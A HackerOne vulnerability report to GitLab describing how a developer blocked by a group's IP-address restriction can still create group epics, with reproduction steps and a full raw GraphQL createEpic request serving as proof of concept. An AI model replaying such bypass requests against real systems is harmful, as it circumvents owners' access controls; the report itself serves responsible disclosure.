A Developer can still create group epic through GraphQL after an owner blocks IP addresses
HackerOne report #2395169 by 0x777 on 2024-02-29, assigned to @rshambhuni:
Report | Attachments | How To Reproduce
Report
NOTE! Thanks for submitting a report! Please note that initial triage is handled by HackerOne staff. They are identified with a
HackerOne triagebadge and will escalate to the GitLab team any. Please replace all the (parenthesized) sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
Summary
(Summarize the bug encountered concisely)
Hi team,
Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group resources (everything...) However, even if blocked a user can still manage to create group epis
Steps to reproduce -
(1.Create a grp, project and add a user as developer
(2.From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add any IP address other than the developer user IP address under Restrict access by IP address
(3.From the developer navigate to https://gitlab.com/GRP/ and verify the 404
From the developer send the following request, but change the title of group epics according to your preferences-
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: <cookie>;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/groups/awesomeman/-/epics/new
Content-Type: application/json
X-Csrf-Token: qPBi6Q24fqPAXtsrHNZwMRpUSkSwI3VwJVoi7Yc_vXJsZ2EFxz_f37rHx2kw1Vg9XJmQregGDy8UaToYpPynog
X-Gitlab-Version: 16.10.0-pre
X-Gitlab-Feature-Category: portfolio_management
Sentry-Trace: 4d2256f7b9a545e2b03cdce23bf62850-83497ee2e34acbf9
Baggage: sentry-environment=gprd,sentry-release=fa5dbb9724c,sentry-public_key=f5573e26de8f4293b285e556c35dfd6e,sentry-trace_id=4d2256f7b9a545e2b03cdce23bf62850
Content-Length: 488
Origin: https://gitlab.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"operationName":"createEpic","variables":{"input":{"addLabelIds":[34722769],"groupPath":"awesomeman","title":"testterme","description":"hfdh fdhfjd fdhdfhjj fdhfdhhfd","confidential":false,"startDateFixed":null,"startDateIsFixed":false,"dueDateFixed":null,"dueDateIsFixed":false,"color":"#1068bf"}},"query":"mutation createEpic($input: CreateEpicInput!) {\n createEpic(input: $input) {\n epic {\n id\n webUrl\n __typename\n }\n errors\n __typename\n }\n}\n"} .............................................................................................................................................................................................................................
(4.Verify the successful response and from the owner verify the group epics created
Here Video POC -
[REDACTED]
Impact
Users from banned IP addresses can manage create group epics where they should be completely blocked from accessing any things that belongs to that group.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
[REDACTED]
How To Reproduce
Please add reproducibility information to this section: